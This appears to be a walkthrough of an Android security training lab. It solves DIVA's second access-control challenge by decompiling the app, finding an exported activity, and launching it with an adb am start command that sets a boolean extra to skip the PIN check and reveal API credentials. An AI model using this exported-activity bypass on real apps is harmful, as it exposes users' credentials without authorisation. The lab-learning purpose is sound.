Access Control Issues - Part 2
When we click on Access Control Issues - Part 2, we would stumble upon an activity with two radio buttons Register Now and Already Registered and a single button - VIEW TVEETER API CREDENTIALS
Let's click on Register Now and then click View Tveeter API Credentials. It asks us to enter a PIN.
On entering some random PIN, we get a toast message - Invalid PIN. Please try again.
The logs (accessed by
adb shell logcat) show that the
APICreds2Activity is displayed when you clicked the button.
Let's go back and select Already Registered radio button. We can see the following:
Having a look again at the logs shows the following:
In both the above cases,
APICreds2Activity activity is invoked. So there might be some logic in the app which decides the content of the activity.
Let's decompile the app using
apktool using the command
apktool d jakhar.aseem.diva-1.apk. On checking the AndroidManifest.xml, we see the following:
We can see that there is an activity
jakhar.aseem.diva.APICreds2Activity defined along with an intent-filter.
Before cracking the challenge, let's understand the basics:
Activity represents a screen with a user interface. All the activites should be declared in AndroidManifest.xml - which turns out to be a binary XML file in the apk file. You can't just use an editor to view the file. You have to decompile the apk file using tools like
apktool to get a readable version of the file.
Intents are message objects in Android system. It allows the communication of two or more apps. An intent-filter of an app specifies the type of intents it accepts based on the intent's action, data, and category. When an intent-filter is used, the activity is exported by default, i.e. any other component could invoke the activity.
Back to the challenge.
We assumed that there might be some internal logic. Let's look at the source code with the help of Dex2Jar and JD-gui. On opening the APICreds2Activity.class file, we can see that there is a check on the string (with ID
getBooleanExtra() is used. If the inverse of the function's result is true, then the API keys are displayed.
How to get the string using it's ID ?
When you use
jd-gui, it gives you a pseudo-code. In this the string and some other resources are generally stored in R.class. On searching the file for the ID
2131099686 we can see that it denotes the string ID chk_pin.
To get the value of chk_pin, open
/res/values/strings.xml in the source code and search for the ID.
We can use the activity manager (
am) to invoke the activity with extra Boolean, with the command:
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity -a jakhar.aseem.diva.action.VIEW_CREDS2 --ez check_pin false
Voila, we invoked the activity with the required action.
Challenge cracked !
- Activity represents a screen with a user interface
- Information about all the activites are declared in AndroidManifest.xml
- Intents are message objects
- intent-filter specifies the type of intents it accepts. If a activity uses this, then it is exported by default.